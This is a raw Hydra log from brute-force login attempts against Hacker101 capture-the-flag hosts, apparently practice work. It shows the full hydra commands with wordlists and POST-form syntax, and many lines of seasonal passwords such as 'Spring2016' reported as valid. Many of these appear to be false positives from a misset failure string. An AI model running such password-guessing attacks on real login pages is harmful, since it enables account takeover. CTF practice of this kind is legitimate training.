# Hydra v9.3 run at 2022-10-19 22:52:09 on 504bc87e31a8c4745883d28d27a5618e.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -o scans/hydra_login -vV 504bc87e31a8c4745883d28d27a5618e.ctf.hacker101.com http-post-form /login:username=^USER^&password=^PASS^:Invalid password)
# Hydra v9.3 run at 2022-10-21 15:55:11 on 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -o scans/hydra_login -vV 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form /login:username=^USER^&password=^PASS^:Invalid password)
# Hydra v9.3 run at 2022-10-21 15:59:04 on 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -o scans/hydra_login -s 443 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form /login:username=^USER^&password=^PASS^:Invalid password)
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Summer2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Summer2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Summer2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: dannilatowski   password: Summer2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Summer2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Summer2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Summer2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: theone   password: Summer2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Summer2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Summer2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Summer2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: stok   password: Summer2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Summer2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Summer2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Summer2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Summer2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: hunter2   password: Summer2017
# Hydra v9.3 run at 2022-10-21 16:01:27 on 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -o scans/hydra_login -s 443 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form /login:username=^USER^&password=^PASS^:Username/Password Combination is invalidw)
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: spring2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2015
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2017
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2016
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2014
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: Summer2013
[443][http-post-form] host: 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com   login: digitalknight   password: summer2017
# Hydra v9.3 run at 2022-10-21 16:01:58 on 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -o scans/hydra_login -s 443 69e6e85ca4011499ecdf4de20d041982.ctf.hacker101.com http-post-form /login:username=^USER^&password=^PASS^:Username/Password Combination is invalid)
